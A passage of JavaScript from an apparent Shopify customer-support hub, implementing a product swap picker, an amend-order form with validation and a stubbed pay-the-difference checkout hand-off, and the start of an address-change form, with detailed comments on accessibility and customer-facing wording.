
      main.appendChild(controls);

      var priceRow = mkEl("p", "lc-swap-line__price");
      function renderLinePrice() {
        priceRow.textContent = t("swap.line.price", {
          qty: line.qty,
          unit: money(line.variant.price),
          total: money(line.qty * line.variant.price)
        });
      }
      renderLinePrice();
      main.appendChild(priceRow);

      row.appendChild(main);

      var rm = mkEl("button", "lc-btn--link", t("swap.line.remove"));
      rm.type = "button";
      rm.setAttribute("aria-label", t("swap.line.removeLabel", { title: line.product.title }));
      rm.addEventListener("click", function () {
        lines.splice(idx, 1);
        /* Removing the last line has to put the grid back, otherwise the
           customer is left on a screen with no products and no way to pick
           one — the "Add more products" button is hidden when nothing is
           chosen. Focus follows the thing that just appeared. */
        if (!lines.length) pickerOpen = true;
        renderLines(); syncVisibility(); update();
        say(t("swap.say.removed", { title: line.product.title }));
        if (pickerOpen) searchInput.focus();
        else if (!addMoreBtn.hidden) addMoreBtn.focus();
      });
      row.appendChild(rm);

      linesWrap.appendChild(row);
    });
  }

  function syncVisibility() {
    pickerWrap.hidden = !pickerOpen;
    addMoreBtn.hidden = pickerOpen || !lines.length;
    totalBox.hidden   = !lines.length;
  }

  function total() {
    return lines.reduce(function (n, l) { return n + l.qty * l.variant.price; }, 0);
  }

  /* --- running total ----------------------------------------------------- */
  function update() {
    var add = total(), swapOut = Number(opts.swapValue) || 0;
    var diff = Math.round((add - swapOut) * 100) / 100;

    while (totalLine.firstChild) totalLine.removeChild(totalLine.firstChild);
    var a = mkEl("span"); a.appendChild(document.createTextNode(t("swap.total.out")));
    a.appendChild(mkEl("b", null, money(swapOut)));
    var sep = mkEl("span", null, "·");
    sep.setAttribute("aria-hidden", "true");   // decorative; the flex gap does the real work
    var b = mkEl("span"); b.appendChild(document.createTextNode(t("swap.total.in")));
    b.appendChild(mkEl("b", null, money(add)));
    totalLine.appendChild(a);
    totalLine.appendChild(sep);
    totalLine.appendChild(b);

    if (diff > 0) {
      verdict.textContent = t("swap.total.toPay", { amount: money(diff) });
      verdict.className = "lc-swap-total__verdict lc-is-owing";
    } else if (diff < 0) {
      verdict.textContent = t("swap.total.refund", { amount: money(-diff) });
      verdict.className = "lc-swap-total__verdict";
    } else {
      verdict.textContent = t("swap.total.even");
      verdict.className = "lc-swap-total__verdict";
    }

    if (opts.onChange) opts.onChange({ lines:lines.slice(), total:add, diff:diff });
  }

  /* --- events ------------------------------------------------------------ */
  var searchTimer = null;
  searchInput.addEventListener("input", function () {
    if (searchTimer) clearTimeout(searchTimer);
    searchTimer = setTimeout(renderGrid, 90);
  });
  /* Enter in a type=search inside a <form> submits the form. It must filter. */
  searchInput.addEventListener("keydown", function (ev) {
    if (ev.key === "Enter") { ev.preventDefault(); if (searchTimer) clearTimeout(searchTimer); renderGrid(); }
  });

  grid.addEventListener("click", function (ev) {
    var card = ev.target.closest ? ev.target.closest(".lc-swap-card") : null;
    /* aria-disabled, because the out-of-stock card is no longer really
       disabled — it stays focusable so keyboard users can find out it exists.
       The !p.available check below is the second, data-side guard. */
    if (!card || card.getAttribute("aria-disabled") === "true") return;
    var p = swapProductById(card.getAttribute("data-product"));
    if (!p || !p.available) return;
    var firstAvailable = p.variants.filter(function (v) { return v.available; })[0] || p.variants[0];

    /* Picking the same product twice used to create two independent rows with
       two independent steppers, a permalink reading "…:1,…:1" for the same
       variant, and a Discord line reading "1x Plushy (Koala) + 1x Plushy
       (Koala)" — which looks like a mistake to whoever picks the task up.
       Distinct VARIANTS of one product are a legitimate case and stay separate;
       an identical variant just increments. */
    var existing = null;
    for (var i = 0; i < lines.length; i++) {
      if (lines[i].variant.id === firstAvailable.id) { existing = lines[i]; break; }
    }
    if (existing) {
      if (existing.qty >= SWAP_QTY_MAX) {
        say(t("swap.say.alreadyAtMax", { title: p.title, max: SWAP_QTY_MAX }));
      } else {
        existing.qty++;
        say(t("swap.say.increased", { title: p.title, qty: existing.qty }));
      }
      pickerOpen = false;
      renderLines(); syncVisibility(); update();
      var row = linesWrap.querySelector("#am-swap-qty-" + existing.uid);
      if (row) row.focus();
      return;
    }

    lines.push({ uid: ++uidSeq, product:p, variant:firstAvailable, qty:1 });
    pickerOpen = false;
    renderLines(); syncVisibility(); update();
    say(t("swap.say.added", { title: p.title }));
    var added = linesWrap.lastChild;
    if (added) {
      var focusable = added.querySelector("select, input");
      if (focusable) focusable.focus();
    }
  });

  addMoreBtn.addEventListener("click", function () {
    pickerOpen = true;
    searchInput.value = "";
    renderGrid(); syncVisibility();
    searchInput.focus();
  });

  /* Restore a basket the customer already built. Without this, "Go back and
     adjust my swap" from the pay-the-difference screen drops them onto an
     empty picker and asks them to rebuild the whole thing — which is exactly
     the moment they give up and email instead. Products that have since gone
     out of stock are dropped rather than restored unbuyable. */
  if (opts.initialLines && opts.initialLines.length) {
    opts.initialLines.forEach(function (l) {
      var p = swapProductById(l.product.id);
      if (!p || !p.available) return;
      lines.push({ uid: ++uidSeq, product:p, variant:swapVariantById(p, l.variant.id), qty:l.qty });
    });
    if (lines.length) pickerOpen = false;
  }

  renderGrid(); renderLines(); syncVisibility(); update();

  return {
    getLines: function () { return lines.slice(); },
    getTotal: total
  };
}

/* Shopify cart permalink: /cart/{variantId}:{qty},{variantId}:{qty}.
   Built but NEVER navigated to in the prototype — see CONFIG.urls.cartPermalinkBase. */
function swapCartPermalink(lines) {
  return CONFIG.urls.cartPermalinkBase + lines.map(function (l) {
    return l.variant.id + ":" + l.qty;
  }).join(",");
}

/* One-line human description of the replacement basket, for Discord/Notion. */
function swapLinesLabel(lines) {
  return lines.map(function (l) {
    return l.qty + "x " + l.product.title +
           (l.variant.title && l.variant.title !== "Default" ? " (" + l.variant.title + ")" : "");
  }).join(" + ");
}

/* ------------------------------------------------------------------------ */

/* --- AMEND: gate + form --------------------------------------------------- */
VIEWS.amendGate = {
  render: function () {
    var order = State.order, el = evaluate(order);
    if (!el.actionable) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(t("amend.heading")) + '</h1>' +
        orderSummaryCard(order, { hideItems:true }) +
        policyNote(el) +
        ineligibleCard(order, "amend-order");
    }
    if (State.submitted["amend-order"]) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(t("amend.heading")) + '</h1>' +
        orderSummaryCard(order, { hideItems:true }) +
        alreadyRequestedCard(order, "amend-order");
    }

    /* Seel protection is deliberately excluded — it is not a toy. */
    var items = realItems(order);
    var rows = items.map(function (li, i) {
      return '<label class="lc-radio-row">' +
        '<input type="radio" name="am-item" value="' + i + '"' + (i === 0 ? " checked" : "") + '>' +
        '<span><b>' + esc(itemLabel(li)) + '</b>' +
        '<small>' + esc(t("shared.quantity", { qty: li.quantity })) + ' · ' +
          money(li.originalTotalSet.shopMoney.amount) + '</small></span></label>';
    }).join("");

    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(t("amend.heading")) + '</h1>' +
      /* P0 (round 5): our records, not the parcel. See policyNote(). */
      '<p class="lc-step-note">' +
        t(el.interceptOnly ? "amend.stepNote.intercept" : "amend.stepNote.open") + '</p>' +
      orderSummaryCard(order, { hideItems:true }) +
      policyNote(el) +
      (el.interceptOnly ? interceptNoticeCard(el, t("intercept.what.change")) : "") +
      '<form class="lc-card" id="amend-form" novalidate>' +
        '<h2>' + esc(t("amend.step1.heading")) + '</h2>' +
        '<div class="lc-radio-list">' + rows + '</div>' +
        (hasSeel(order)
          ? '<p class="lc-step-note">' + t("amend.seelNote") + '</p>' : "") +

        '<h2 style="margin-top:22px">' + esc(t("amend.step2.heading")) + '</h2>' +
        '<div class="lc-radio-list">' +
          '<label class="lc-radio-row"><input type="radio" name="am-action" value="reduce" checked>' +
            '<span><b>' + esc(t("amend.action.reduce.title")) + '</b><small>' +
              t("amend.action.reduce.body") + '</small></span></label>' +
          '<label class="lc-radio-row"><input type="radio" name="am-action" value="swap">' +
            '<span><b>' + esc(t("amend.action.swap.title")) + '</b><small>' +
              t("amend.action.swap.body") + '</small></span></label>' +
        '</div>' +

        /* A5: no mechanism is named here. The client is building a returns and
           exchanges hub that will offer store credit, a discounted refund or a
           straight exchange, and a screen that has already promised "back on
           your card" removes every one of those options before the team has
           spoken to the customer. This still commits to putting it right. */
        '<div class="lc-field" id="am-qty-field">' +
          '<label for="am-qty">' + esc(t("amend.qty.label")) + '</label>' +
          '<p class="lc-hint" id="am-qty-hint">' + t("amend.qty.hint") + '</p>' +
          '<input id="am-qty" type="number" min="0" step="1" value="1" ' +
            'aria-describedby="am-qty-hint am-qty-err">' +
          '<p class="lc-field-error" id="am-qty-err" role="alert" hidden></p>' +
        '</div>' +

        /* The picker itself is built in mount() with createElement — see
           buildSwapPicker(). This is only its empty host. */
        '<div id="am-swap-field" hidden>' +
          '<h3 style="margin:4px 0 4px">' + esc(t("amend.swap.heading")) + '</h3>' +
          '<p class="lc-hint" style="margin:0 0 12px" id="am-swap-help">' +
            t("amend.swap.help", { max: SWAP_QTY_MAX }) + '</p>' +
          '<div id="am-swap-picker"></div>' +
          '<p class="lc-field-error" id="am-swap-err" role="alert" hidden></p>' +
        '</div>' +

        '<div class="lc-field">' +
          '<label for="am-reason">' + esc(t("amend.reason.label")) + '</label>' +
          '<p class="lc-hint" id="am-reason-hint">' + t("amend.reason.hint") + '</p>' +
          '<textarea id="am-reason" aria-describedby="am-reason-hint am-reason-err" ' +
            'placeholder="' + esc(t("amend.reason.placeholder")) + '"></textarea>' +
          '<p class="lc-field-error" id="am-reason-err" role="alert" hidden></p>' +
        '</div>' +

        /* Where a failed send is reported — see submitFailed(). Separate from
           the per-field errors above: this one is about the request as a whole,
           not about anything the customer got wrong. */
        '<p class="lc-field-error" id="am-form-err" role="alert" tabindex="-1" hidden></p>' +

        '<div class="lc-btn-row">' +
          '<button type="submit" class="lc-btn" id="am-submit">' +
            esc(t("amend.submit")) + '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
            esc(t("shared.btn.cancel")) + '</button>' +
        '</div>' +
      '</form>';
  },

  mount: function () {
    var form = $("#amend-form");
    if (!form) return;
    var order = State.order, items = realItems(order);
    var picker = null, pickerFor = null, pickerState = { lines:[], total:0, diff:0 };
    var submitBtn = $("#am-submit");
    var defaultSubmitLabel = t("amend.submit");

    function selectedItem() {
      var i = Number($("input[name='am-item']:checked").value);
      return items[i];
    }
    function selectedAction() {
      return $("input[name='am-action']:checked").value;
    }
    function swapValueOf(li) {
      return Number(li.originalTotalSet.shopMoney.amount) || 0;
    }

    /* The CTA has to state the consequence before it is pressed. Once the
       replacement basket is worth more than the item coming out, "Send my
       change request" is a lie by omission — there is money to pay and the
       page cannot take it. */
    function syncSubmit() {
      if (!submitBtn || submitBtn.disabled) return;
      var payMore = selectedAction() === "swap" && pickerState.diff > 0;
      submitBtn.textContent = payMore ? t("amend.submit.payDifference") : defaultSubmitLabel;
    }

    /* Rebuilt whenever the item being swapped changes, because that item is
       excluded from the recommendations — swapping a Pool Tent must never
       offer a Pool Tent back. */
    function buildPicker() {
      var li = selectedItem();
      if (pickerFor === li) return;
      pickerFor = li;
      var host = $("#am-swap-picker");
      if (!host) return;
      while (host.firstChild) host.removeChild(host.firstChild);
      pickerState = { lines:[], total:0, diff:0 };
      /* Coming back from the pay-the-difference screen, rebuild what they had.
         Only for the SAME line item — State.amend is stale the moment they
         pick a different one. */
      var prior = (State.amend && State.amend.item === li) ? State.amend.lines : null;
      picker = buildSwapPicker(host, {
        /* The whole line item, not just its title — see swapBuildIndex(). */
        exclude: li,
        swapValue: swapValueOf(li),
        initialLines: prior,
        onChange: function (s) { pickerState = s; syncSubmit(); }
      });
      syncSubmit();
    }

    function syncFields() {
      var swap = selectedAction() === "swap";
      $("#am-swap-field").hidden = !swap;
      $("#am-qty-field").hidden = swap;
      /* max is quantity-1: the validator requires qty < quantity, so a spinner
         whose top value is always rejected is just a trap. */
      if (!swap) $("#am-qty").max = String(Math.max(0, selectedItem().quantity - 1));
      if (swap) buildPicker();
      syncSubmit();
    }
    $$("input[name='am-action']", form).forEach(function (r) {
      r.addEventListener("change", syncFields);
    });
    $$("input[name='am-item']", form).forEach(function (r) {
      /* Changing the item invalidates the picker: its exclusion and the value
         being swapped both come from that line. */
      r.addEventListener("change", function () { pickerFor = null; syncFields(); });
    });

    /* Returning from the pay-the-difference hand-off: put the form back the
       way they left it — same line item, still on "swap", reason intact —
       before syncFields() builds the picker, so the restore lands in one pass
       rather than flashing an empty grid first. */
    if (State.amend && State.amend.lines && State.amend.lines.length) {
      var backIdx = items.indexOf(State.amend.item);
      if (backIdx > -1) {
        var itemRadio = $("input[name='am-item'][value='" + backIdx + "']", form);
        if (itemRadio) itemRadio.checked = true;
        var swapRadio = $("input[name='am-action'][value='swap']", form);
        if (swapRadio) swapRadio.checked = true;
        if (State.amend.reason) $("#am-reason").value = State.amend.reason;
      }
    }

    syncFields();

    /* A disabled submit BUTTON does not stop implicit submission — Enter in a
       text field still fires this handler — so the in-flight guard has to be
       here, exactly as it is on the lookup form. */
    var amSending = false;

    form.addEventListener("submit", function (ev) {
      ev.preventDefault();
      if (amSending) return;
      var li = selectedItem(), action = selectedAction();
      var reason = ($("#am-reason").value || "").trim();
      var ok = true;

      var rErr = $("#am-reason-err");
      if (!reason) {
        $("#am-reason").setAttribute("aria-invalid","true"); ok = false;
        revealAlert(rErr, t("amend.err.reason"));
      } else { rErr.hidden = true; rErr.textContent = ""; $("#am-reason").setAttribute("aria-invalid","false"); }

      var qtyRaw = String($("#am-qty").value).trim();
      var qty = Number(qtyRaw);
      var qErr = $("#am-qty-err");
      if (action === "reduce") {
        /* An empty box is NOT zero. Number("") === 0 passed the range check, so
           clearing the field silently became "ship nothing (remove this item)"
           and asked the 3PL to cancel the whole line. */
        var valid = qtyRaw !== "" && /^\d+$/.test(qtyRaw) && qty >= 0 && qty < li.quantity;
        if (!valid) {
          $("#am-qty").setAttribute("aria-invalid","true"); ok = false;
          revealAlert(qErr, t("amend.err.qty", { max: li.quantity - 1 }));
        } else { qErr.hidden = true; qErr.textContent = ""; $("#am-qty").setAttribute("aria-invalid","false"); }
      }

      var swapLines = action === "swap" ? (picker ? picker.getLines() : []) : [];
      var sErr = $("#am-swap-err");
      if (action === "swap") {
        if (!swapLines.length) {
          ok = false;
          revealAlert(sErr, t("amend.err.swapEmpty"));
        } else { sErr.hidden = true; sErr.textContent = ""; }
      }

      if (!ok) {
        var bad = $$("[aria-invalid='true']", form)[0];
        if (bad) bad.focus();
        else if (sErr && !sErr.hidden) { var q = $("#am-swap-q"); if (q) q.focus(); }
        return;
      }

      var current = li.quantity + "x " + itemLabel(li);
      var desired = action === "swap"
        ? swapLinesLabel(swapLines)
        : (qty === 0 ? t("amend.desired.nothing") : qty + "x " + itemLabel(li));

      var swapOutValue = swapValueOf(li);
      var swapInValue  = action === "swap" ? picker.getTotal() : 0;
      var owes = action === "swap" && Math.round((swapInValue - swapOutValue) * 100) / 100 > 0;

      /* ---------------------------------------------------------------------
         PAY-THE-DIFFERENCE BRANCH — STUBBED ON PURPOSE.
         The replacement basket is worth more than the item coming out. We show
         the cart permalink this would open and stop there, because opening it
         would create a SECOND, UNRELATED ORDER at full price while the customer
         is still owed the value of the first one. Nothing on this page can
         reconcile those two; the backend has to. Sending a half-finished
         amendment to the 3PL in the meantime would have them pack a swap the
         customer has not paid for, so no Discord message and no Notion row is
         raised here either — and State.submitted is deliberately NOT set, so
         the customer can come back and finish or change their mind.
         --------------------------------------------------------------------- */
      if (owes) {
        State.amend = {
          item: li, current: current, desired: desired, reason: reason,
          lines: swapLines,
          swapOut: swapOutValue, swapIn: swapInValue,
          difference: Math.round((swapInValue - swapOutValue) * 100) / 100,
          permalink: swapCartPermalink(swapLines)
        };
        Router.go("swapCheckout", { fade:true });
        return;
      }

      /* Belt and braces behind the gate's guard, which is a different view: a
         customer who reaches this form again with a request already in must not
         fire a second one at the packing team. */
      if (State.submitted["amend-order"]) {
        say(t("shared.say.alreadySent"));
        Router.go("amendGate", { replace:true });
        return;
      }

      var btn = $("#am-submit");
      var amErr = $("#am-form-err");
      if (amErr) { amErr.hidden = true; amErr.textContent = ""; }
      amSending = true;
      /* aria-disabled, not the real attribute — see the cancel flow. `amSending`
         above is the real re-entrancy guard and it also covers Enter-in-a-field
         implicit submission, which a disabled button never did. */
      btn.setAttribute("aria-disabled", "true");
      btn.innerHTML = '<span class="lc-spinner"></span> ' + esc(t("shared.btn.sending"));
      say(t("shared.say.sending"));

      /* THE REAL SEND. Field names are the Worker's contract, not ours: the two
         swap values go across as VALUES, never as a difference — the browser's
         arithmetic is not evidence of anything and the backend subtracts them
         itself for the CS row. */
      submitRequest("amend-order", {
        reason:        reason,
        currentItem:   current,
        desiredItem:   desired,
        lineItemId:    li.id,
        swapOutValue:  swapOutValue,
        swapInValue:   swapInValue
      }).then(function (res) {
        amSending = false;
        if (!State.order || State.order !== order) {
          if (res && res.ok) say(submitAnnouncement("amend-order", res));
          return;
        }

        if (!res.ok) {
          submitFailed("amend-order", res, amErr, function (canRetry) {
            if (!canRetry) { btn.hidden = true; return; }
            btn.setAttribute("aria-disabled", "false");
            btn.textContent = t("shared.btn.tryAgain");
          });
          return;
        }

        var id = res.requestId;
        var amendEl = evaluate(order);
        /* The SERVER's state, not our stale copy — see interceptVerdict(). */
        var amendIntercept = interceptVerdict(res, amendEl);
        /* STAFF-FACING. Tells whoever picks the task up which of the two
           situations they are in before they message the packing team. */
        var amendStateLine = amendIntercept
          ? interceptStaffLine(amendEl) + " — INTERCEPTION REQUEST. "
          : "";
        /* ONLY NOW — a failed submit above returned without touching this, so
           the flow stays retryable. */
        State.submitted["amend-order"] = id || true;
        var ctx = buildDiscordContext(order, {
          qty: li.quantity, product: itemLabel(li),
          reason: reason, desired: desired, current: current
        });
        var summary = "Customer asked to amend " + order.name + ": " + current + " → " +
                      desired + ". Reason: " + reason +
                      (action === "swap"
                        ? " [Value out " + money(swapOutValue) + " / value in " +
                          money(swapInValue) + " — customer is owed " +
                          money(swapOutValue - swapInValue) + "]"
                        : "");
        State.result = {
          requestId: id,
          discordTitle: t("preview.title"),
          discord: CONFIG.discord.amendment(ctx),
          /* STAFF-FACING. Deliberately says "reconcile", not "refund": the
             client is standing up a returns and exchanges hub, and the person
             picking this task up chooses between store credit, a discounted
             refund and an exchange. Hard-coding one of those into the task is
             what put a promise on the customer's screen in the first place. */
          notion: baseNotionProps(order, "amend-order", summary,
                    fmtDateTime(new Date().toISOString()) + " — Request " + idForLog(id) +
                    " raised from the contact hub. " + amendStateLine +
                    "Awaiting confirmation from " + CONFIG.fulfillment.threePL +
                    ". If confirmed, adjust the line items in Shopify and " +
                    "reconcile the value difference with the customer through the returns " +
                    "and exchanges process (human approval required before anything moves)."),
          heading: t("amend.success.heading"),
          blurb: t("amend.success.blurb", { order: order.name, email: order.email }),
          flow: "amend-order",
          /* A5: commits to sorting the difference out, names no mechanism. */
          extraNote: joinNotes(
                       relayNote(res), recordNote(res),
                       t("amend.success.note"),
                       interceptSuccessNote(amendEl, amendIntercept)),
          announce: submitAnnouncement("amend-order", res)
        };
        Router.go("success", { fade:true });
      })
      /* See the cancel flow: a throw while BUILDING the confirmation must not
         leave a permanently-disabled button on a flow already marked sent. */
      .catch(function (e) {
        amSending = false;
        if (window.console && console.error) console.error("[contact-hub] submit render", e);
        try {
          var told = !!State.submitted["amend-order"];
          submitFailed("amend-order",
            told ? { ok:false, told:true, reason:"render",
                     requestId: typeof State.submitted["amend-order"] === "string"
                       ? State.submitted["amend-order"] : "" }
                 : { ok:false, told:false, reason:"unknown" },
            amErr,
            function (canRetry) {
              if (!canRetry) { btn.hidden = true; return; }
              btn.setAttribute("aria-disabled", "false");
              btn.textContent = t("shared.btn.tryAgain");
            });
        } catch (e2) { /* never throw out of a catch handler */ }
      });
    });
  }
};

/* ------------------------------------------------------------------------ */

/* ===========================================================================
   SWAP → CHECKOUT HAND-OFF (A6.7) — DELIBERATE DEAD END, NOT AN OVERSIGHT.

   Reached only when the replacement basket is worth MORE than the item being
   swapped out. The screen shows the exact Shopify cart permalink it would
   open and does not open it, because opening it is wrong today:

     * a cart permalink starts a brand new order. It carries no reference to
       the original one, so the customer pays full price for the replacements
       and is still owed the value of what they swapped out;
     * the original order has not been amended — the packing team has not even
       been asked yet, and the batch may go out with the old item in it;
     * nothing on this page can credit the removed line or apply a matching
       discount code. Both are Admin API writes behind human approval.

   What the backend needs to do before this button navigates: cancel/credit the
   removed line item, generate a single-use discount for its value, and append
   `?discount=CODE` to this permalink. Until then, showing the URL is the
   honest version — and no Discord/Notion request is raised, so the customer
   can back out and change their mind.
   =========================================================================== */
VIEWS.swapCheckout = {
  render: function () {
    var a = State.amend, order = State.order;
    if (!a) return errorCard();

    var lineRows = a.lines.map(function (l) {
      return '<li><span>' + esc(l.product.title) +
        (l.variant.title && l.variant.title !== "Default"
          ? '<br><span class="lc-qty">' + esc(l.variant.title) + '</span>' : '') +
        '<br><span class="lc-qty">' + esc(t("shared.quantity", { qty: l.qty })) + '</span></span>' +
        '<span class="lc-price">' + money(l.qty * l.variant.price) + '</span></li>';
    }).join("");

    return backBar(t("swapCheckout.back")) +
      '<h1 data-view-title>' + esc(t("swapCheckout.heading")) + '</h1>' +
      '<p class="lc-step-note">' + t("swapCheckout.intro") + '</p>' +

      '<section class="lc-card">' +
        '<h2>' + esc(t("swapCheckout.out.heading")) + '</h2>' +
        '<ul class="lc-items"><li><span>' + esc(itemLabel(a.item)) +
          '<br><span class="lc-qty">' + esc(t("shared.quantity", { qty: a.item.quantity })) + '</span></span>' +
          '<span class="lc-price">' + money(a.swapOut) + '</span></li></ul>' +
        '<h2 style="margin-top:20px">' + esc(t("swapCheckout.in.heading")) + '</h2>' +
        '<ul class="lc-items">' + lineRows + '</ul>' +
        '<div class="lc-swap-total" style="margin-top:16px">' +
          '<p class="lc-swap-total__line"><span>' + esc(t("swap.total.out")) +
            '<b>' + money(a.swapOut) + '</b></span>' +
            '<span aria-hidden="true">·</span>' +
            '<span>' + esc(t("swap.total.in")) + '<b>' + money(a.swapIn) + '</b></span></p>' +
          '<p class="lc-swap-total__verdict lc-is-owing">' +
            esc(t("swap.total.toPay", { amount: money(a.difference) })) + '</p>' +
        '</div>' +
      '</section>' +

      /* HEDGED, like every other amendment string in the file. The gate this
         screen is reached from says "This is a request — our packing team has
         to confirm it", and both A5 rewrites open with "If they can catch it in
         time". The order can be swept into the day's dispatch at any moment, so a
         flat "we will put the value towards the new one" promised an outcome
         the packing team may not be able to deliver. */
      '<section class="lc-card lc-card--info">' +
        '<h2 style="font-size:calc(0.98823529em * var(--lc-heading-scale))">' +
          esc(t("swapCheckout.next.heading")) + '</h2>' +
        '<p>' + t("swapCheckout.next.body1", {
          email: esc(CONFIG.store.supportEmail), order: esc(order.name)
        }) + '</p>' +
        /* A6.7 requires this note to be visible to the CUSTOMER. It used to sit
           inside the debug-gated stub below, so it vanished the moment the
           developer followed the instruction to set showInternalPreviews:false
           for the Shopify build. It renders unconditionally now; only the raw
           permalink, which exposes internal variant ids, stays behind the flag. */
        '<p>' + t("swapCheckout.next.body2") + '</p>' +
        '<p style="margin:0">' + t("swapCheckout.next.body3") + '</p>' +
      '</section>' +

      /* The real CTA A6.7 asks for. It reveals the hand-off rather than
         navigating — see the block comment above this view for why following
         the permalink today would charge the customer twice. It is the primary
         action either way, so the screen is never just an email address. */
      '<section class="lc-card">' +
        '<h2 style="font-size:calc(0.98823529em * var(--lc-heading-scale))">' +
          esc(t("swapCheckout.cta.heading")) + '</h2>' +
        '<p>' + t("swapCheckout.cta.body", { amount: money(a.difference) }) + '</p>' +
        '<div class="lc-btn-row">' +
          '<a class="lc-btn" href="mailto:' + esc(CONFIG.store.supportEmail) + '?subject=' +
            encodeURIComponent(t("swapCheckout.cta.subject", { order: order.name })) +
            '">' + esc(t("swapCheckout.cta.button")) + '</a>' +
        '</div>' +
        '<p class="lc-track-note">' + t("swapCheckout.cta.note") + '</p>' +
      '</section>' +

      /* INTERNAL PREVIEW panel, off by default in the theme (see the
         "Show internal Discord/Notion previews" section setting) —
         it is the one thing here that exposes internal variant ids. The A6.7
         customer-facing note above does NOT live in here any more. */
      (CONFIG.debug && CONFIG.debug.showInternalPreviews
        ? '<section class="lc-card lc-card--warn">' +
            '<div class="lc-preview__h"><h2 style="font-size:calc(0.94117647em * var(--lc-heading-scale))">' +
              esc(t("swapCheckout.stub.heading")) + '</h2>' +
              '<span class="lc-chip lc-chip--alert">' + esc(t("swapCheckout.stub.chip")) + '</span></div>' +
            '<p style="margin:0 0 4px">' + t("swapCheckout.stub.body1") + '</p>' +
            '<code class="lc-permalink">' + esc(a.permalink) + '</code>' +
            '<p style="margin:12px 0 0">' + t("swapCheckout.stub.body2", {
              order: esc(order.name), amount: money(a.swapOut)
            }) + '</p>' +
          '</section>'
        : '') +

      '<div class="lc-btn-row">' +
        '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
          esc(t("swapCheckout.adjust")) + '</button>' +
        '<button type="button" class="lc-btn lc-btn--ghost" data-home>' +
          esc(t("shared.btn.backToHub")) + '</button>' +
      '</div>';
  }
};

/* ------------------------------------------------------------------------ */

/* --- ADDRESS CHANGE: gate ------------------------------------------------- */
VIEWS.addressGate = {
  render: function () {
    var order = State.order, el = evaluate(order);
    if (!el.actionable) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(t("address.heading")) + '</h1>' +
        orderSummaryCard(order, { hideItems:true }) +
        policyNote(el) +
        ineligibleCard(order, "address-change");
    }
    if (State.submitted["address-change"]) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(t("address.heading")) + '</h1>' +
        orderSummaryCard(order, { hideItems:true }) +
        alreadyRequestedCard(order, "address-change");
    }
    /* Eligible — go straight into the form, no extra click. */
    Router.stack[Router.stack.length - 1] = { name:"addressForm", params:{} };
    return VIEWS.addressForm.render({});
  },
  mount: function (p) {
    if (Router.current().name === "addressForm") VIEWS.addressForm.mount(p);
  }
};

/* --- ADDRESS CHANGE: current (read-only) + new address form --------------- */
VIEWS.addressForm = {
  render: function () {
    var order = State.order, a = order.shippingAddress;
    /* WHAT CARRIES OVER AND WHY.
       address1 / city / zip start BLANK on purpose — those are the lines people
       come here to change, and pre-filling them invites a half-edited address.

       address2 and province do NOT start blank. They are optional and are not
       in the required[] list, so a customer who only retypes the street, town
       and postcode used to leave them empty — and the review screen then diffed
       "Unit 3" against "" and announced "Address line 2 removed" / "State /
       region removed" as highlighted changes the customer never made. On the
       last screen before a checkbox reading "no further changes can be made",
       that reads as "the system has deleted my flat number".

       BUT address2 and province are deliberately NOT carried over. The single
       most common reason anyone reaches this form is a grandparent whose own
       home address autofilled at checkout, redirecting the parcel to a
       grandchild in a different town, state or country. Pre-seeding the old
       suburb and region there is worse than a confusing label: it silently
       ships "34 Masket Street, Bethlehem, Auckland" — a Tauranga suburb inside
       an Auckland address — because the customer had no reason to look at a
       field they never intended to touch.

       The phantom-deletion problem the pre-fill was trying to solve is handled
       properly in the review step instead: a blank optional line that used to
       have content renders as "<Field> — you left this blank" rather than
       announcing a removal. That prompts without alarming, and without
       smuggling stale data into a new address.

       Name, phone, company and country DO carry over — those genuinely tend to
       stay the same, and all four are visible and proof-read on the next step. */
    var d = State.address || {
      name:    a.name || ((a.firstName || "") + " " + (a.lastName || "")).trim(),
      phone:   a.phone || "",
      company: a.company || "",
      address1:"",
      address2:"",
      city:"",
      province:"",
      zip:"",
      country: a.country || ""
    };

    var el = evaluate(order);

    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(t("address.heading")) + '</h1>' +
      /* "we can still move it" was a flat promise. The message that actually
         goes out asks the 3PL "Can this be amended before delivery? Please
         advise." The cancel and amend flows both hedge honestly; this one must
         too — and on TRACKING_ASSIGNED it has to hedge harder still. */
      /* P0 (round 5): our records, not the parcel. See policyNote(). */
      '<p class="lc-step-note">' +
        t(el.interceptOnly ? "address.stepNote.intercept" : "address.stepNote.open") + '</p>' +

      (el.interceptOnly ? interceptNoticeCard(el, t("intercept.what.redirect")) : "") +

      '<section class="lc-card">' +
        '<div class="lc-preview__h"><h2 style="font-size:calc(1.03529412em * var(--lc-heading-scale))">' +
          esc(t("address.current.heading")) + '</h2>' +
          '<span class="lc-chip lc-chip--quiet">' + esc(t("address.current.chip")) + '</span></div>' +
        '<p style="white-space:pre-line;font-weight:700;margin:0">' +
          esc(addressBlock(a)) + '</p>' +
      '</section>' +

      '<form class="lc-card" id="addr-form" novalidate>' +
        '<h2>' + esc(t("address.form.heading")) + '</h2>' +

        '<div class="lc-field">' +
          '<label for="ad-name">' + esc(t("address.form.nameLabel")) + '</label>' +
          '<input id="ad-name" type="text" autocomplete="name" value="' + esc(d.name) + '" ' +
            'aria-describedby="ad-name-err">' +
          '<p class="lc-field-error" id="ad-name-err" role="alert" hidden></p>' +
        '</div>' +

        /* The reason we want a phone number was previously a placeholder only.
           Every order already carries a phone, so the field renders pre-filled
           and the placeholder was never painted at all; when it was, it
           truncated at 375px; and it was absent from the accessible
           description. It is a real hint element now, like every sibling. */
        '<div class="lc-field">' +
          '<label for="ad-phone">' + esc(t("address.form.phoneLabel")) + '</label>' +
          '<p class="lc-hint" id="ad-phone-hint">' + esc(t("address.form.phoneHint")) + '</p>' +
          '<input id="ad-phone" type="tel" autocomplete="tel" value="' + esc(d.phone) + '" ' +
            'placeholder="' + esc(t("address.form.phonePlaceholder")) + '" ' +
            'aria-describedby="ad-phone-hint ad-phone-err">' +
          '<p class="lc-field-error" id="ad-phone-err" role="alert" hidden></p>' +
        '</div>' +

        /* B3 — Company is off by default, matching the client's Shopify
           checkout, where the field is disabled (as Shopify recommends). There
           is no point asking for a line checkout never collected and the review
